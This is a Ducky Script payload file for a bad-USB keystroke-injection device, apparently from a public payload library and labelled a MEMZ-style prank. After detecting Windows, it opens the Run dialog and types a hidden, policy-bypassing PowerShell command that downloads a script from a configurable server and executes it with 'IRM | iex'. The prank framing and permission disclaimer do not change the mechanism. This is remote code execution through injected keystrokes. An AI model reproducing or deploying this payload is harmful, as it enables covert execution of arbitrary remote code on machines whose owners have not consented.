Path: blob/master/payloads/library/prank/MEMZ-with-Powershell/Payload.txt
2968 views
REM Author: beigeworm1REM Title: MEMZ-with-Powershell2REM Target: Windows 10/113REM Description: This script displays various screen effects similar to the classic MEMZ trojan (Non-Destructive).4REM Description: Hold ESCAPE for 5 seconds to kill the script.56REM **THIS SCRIPT IS INTENDED FOR USE ON SYSTEMS YOU OWN OR HAVE BEEN GIVEN PERMISSION TO USE!**78REM Replace the URL for your own hosted .ps1 raw file.9DEFINE #SCRIPTURL https://yourserver.com/rawfile/Powershell-MEMZ.ps11011REM Funtion to detect Windows is ready for keystrokes12EXTENSION PASSIVE_WINDOWS_DETECT13REM VERSION 1.114REM AUTHOR: Korben1516REM CONFIGURATION:17DEFINE #MAX_WAIT 15018DEFINE #CHECK_INTERVAL 2019DEFINE #WINDOWS_HOST_REQUEST_COUNT 220DEFINE #NOT_WINDOWS 72122$_OS = #NOT_WINDOWS2324VAR $MAX_TRIES = #MAX_WAIT25WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))26DELAY #CHECK_INTERVAL27$MAX_TRIES = ($MAX_TRIES - 1)28END_WHILE29IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN30$_OS = WINDOWS31END_IF3233END_EXTENSION3435IF $_OS != WINDOWS36LED_R37STOP_PAYLOAD38END_IF3940REM Main bad-USB script41LED_G42GUI r43DELAY 75044STRINGLN powershell -Ep Bypass -W H -C IRM #SCRIPTURL | iex45464748